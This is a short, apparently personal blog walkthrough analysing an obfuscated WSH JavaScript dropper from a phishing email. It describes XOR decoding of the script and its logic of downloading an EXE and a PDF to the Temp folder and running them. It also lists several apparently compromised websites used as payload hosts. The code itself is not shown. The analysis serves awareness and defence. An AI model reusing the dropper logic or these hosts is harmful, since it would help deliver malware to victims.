Phishing and their "obfuscated" code
PLEASE DO NOT TRY THIS UNLESS YOU KNOW WHAT YOU ARE DOING.
I usually receive a lot of phishing and sometimes i get a mail where they attach a zip file.
after giving that zip to the antivirus, i opened it. i found this 2 files:
Now the .txt file tells you to double click the .js which is a WSH script and is what we are going to "reverse".
Ok, so this is the .js file.
now it looks like a mess.. or maybe not?
if you look closely you'll see something interesting:
There are 2 vars, one long which looks like a key then a longer one which looks like an encrypted message.
After that there is a for loop and what looks like a XOR operation:
Now the most simple cryptographic method is XOR and we have at the start something that looks like a key; So let's clean the code!
To do that, I simply use the search and replace function in Notepad++ (most of the text editors have this function).
Before executing that just a few notes:
- I changed a little the code to make it more understandable, since there was a long inline code.
- As you can see it takes enc_data and do the XOR operation with the key char by char; when the index i is equals to the length of the key, it will be updated to zero (what it essentially does is the module operation with the length of the key string).
So this is the output of that console.log():
Let's make again some clean up because it looks messy, but as you can see, this is already readable..
Ok this is quite simple:
- There is a value which I suppose is a date (because i received that the 7 of October and the language of the mail was Italian).
- Then a declaration of a function which is called 2 times at the end of the code.
- Inside the function there is an encrypted list (it's a list because there is a .split() at the end of the string which is a method that returns an array of strings)
- They checks if arg is empty or not and set the extension name which will be used later.
- There is a for where for each element of the enc_list will do some stuff.
- At the end, it will call the function 2 times (you'll understand why, later).
- Allocates a Windows Script Shell object, then it will compose a disk location (i called the variable where); it will be filled with something like: C:\Users\
< username> \AppData\Local\Temp\ <random number><extension>, where username is the name of the current user and extension is the file extension (".exe" and ".pdf").
- Initialize the variable ok to false.
- Initialize a XHR object (which is used to download a file from the web).
- Tells to the XHRObj that once downloaded the data, place it inside the file C:\Users\<username>\AppData\Local\Temp\<random number><extension> and then execute it.
- Then it decrypts the enc_list one by one and once decrypted it concatenate some strings to make an URL and then tries to download the file.
- if it doesn't fail it stops the loop, if not then it changes the list entry and tries again.
ENTHELP.COM www.SMOKEDMEATSANDMORE.COM ERVINSOLAR.NET DIGITALCONTACT.COM/wp-content/themes/optimizePressTheme INNOXFUSTA.COM MAXMSP.ORG/wp-content/uploads www.DADSONASSOCIATES.COM
which I expect to be exploited websites where they uploaded their shit (aka those files + some other stuff).
If you clean all the code, removing all the obfuscation you'll get original code:
Now I'll explain the purpose of this "mess" if not clear yet:
What it does is decrypting it's internal data which download 2 file from a host; those 2 files are: an EXE and a PDF which are fetched and executed by calling download_data("") (which will fetch the exe) and download_data("&pdf=FhbanGAKJrjHEGz") (which will fetch the pdf).
Now I do not know what those files are, because i haven't executed that script; I can assume they are harmful programs (since this comes from a phishing mail).
So be always aware of what you are going to execute, because it can be really harmful like this WSH file.
if you do not know what you downloaded, delete it! do not trust what you do not know.